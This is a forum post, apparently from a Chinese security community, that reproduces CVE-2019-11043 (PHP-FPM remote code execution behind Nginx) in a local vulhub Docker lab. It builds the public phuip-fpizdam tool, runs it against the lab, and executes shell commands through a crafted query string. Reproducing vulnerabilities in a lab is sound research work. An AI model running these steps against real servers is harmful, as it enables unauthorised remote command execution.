请选择
进入手机版
|
继续访问电脑版
用户登录
免费注册
设为首页
加入收藏
中国红客联盟 - 08安全团队
本版
用户
全站首页
社区首页
官方自媒体
关于本站
在线工具
家园
Space
排行榜
Ranklist
倡导绿色健康网络
关于我们
致—红盟会员
发展历程
核心人员
Web问答
Web文章
Web漏洞
图书馆
在线视频
红客焦点
系统问题
Windows
Linux/MAC
无线安全
移动终端
系统漏洞
编程问题
脚本问题
编程技术
脚本技术
逆向破解
八卦水库
影音视频
最新资讯
资源分享
中国红客联盟 - 08安全团队
»
社区首页
›
Web攻防
›
技术文章
›
[漏洞复现]CVE-2019-11043/PHP-FPM在Nginx特定配置下远 ...
返回列表
查看:
2861
|
回复:
0
[漏洞复现]CVE-2019-11043/PHP-FPM在Nginx特定配置下远程代码执行
[复制链接]
Te5tB99
Te5tB99
当前离线
积分
709
TA的每日心情
擦汗
2021-4-11 00:57
签到天数: 421 天
[LV.9]以坛为家II
发表于 2019-10-25 23:53:09
|
显示全部楼层
|
阅读模式
本帖最后由 Te5tB99 于 2019-10-25 23:55 编辑
环境准备
可以使用vulhub的环境
先在本地创建一个名为CVE-2019-11043的文件夹,再创建一个名为www的文件夹
在CVE-2019-11043文件夹下执行如下命令
wget
https://raw.githubusercontent.co ... -11043/default.conf
wget
https://raw.githubusercontent.co ... /docker-compose.yml
在CVE-2019-11043/www文件夹下执行如下命令
wget
https://raw.githubusercontent.co ... 11043/www/index.php
下载完成三个文件以后,在CVE-2019-11043文件夹下执行如下命令启动环境
service docker start
docker-compose up -d
随后访问http://ip:8080/index.php即可
工具准备
访问
https://github.com/neex/phuip-fpizdam
,clone到本地以后,执行如下命令(将根据OS自动生成对应的OS版本)
go build
即可生成phuip-fpizdam工具
漏洞复现
使用./phuip-fpizdam http://ip:8080/index.php攻击漏洞环境
随后访问http://ip:8080/index.php?a=/bin/sh+-c%20%27id%27&即可
按照步骤已成功在mac上复现,但因涉及环境及服务较多,复现结果以实际为准;建议大家在linux系统复现。
该文章转自亚信科技
清水 川崎 @shimizukawasaki
的qiita文章。
原文链接
点我阅读原文
回复
使用道具
举报
置顶卡
变色卡
返回列表
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表